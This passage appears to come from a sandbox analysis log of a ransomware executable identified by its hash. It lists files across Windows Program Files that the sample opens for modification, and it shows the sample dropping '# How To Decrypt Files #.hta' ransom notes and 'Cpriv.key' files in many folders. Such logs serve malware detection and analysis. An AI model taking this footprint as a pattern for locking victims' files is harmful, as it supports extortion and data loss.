Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\SLERROR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21448_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Stock Quotes.iqy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Memo.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0186348.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21324_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\HAMMER.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00184_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.PPT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBCOLOR.SCM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\RES98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\hi.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RIPPLE\RIPPLE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ENGDIC.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\3082\MSO.ACL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00485_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\EXITEMS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\UrbanReport.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RADIAL\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Thatch.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EquityLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02296_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14513_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14565_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\MMSS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts2.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\es\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21300_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PSRCHPHN.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\flyout.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\11.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LETTHEAD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.PL.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\Accessories\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WING1.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\km\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\FrameworkList.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Mail\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\List.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\TableTextService\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_On.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01154_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PG_INDEX.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107544.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0229389.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02198_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLENDS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01179_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Tabs.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows 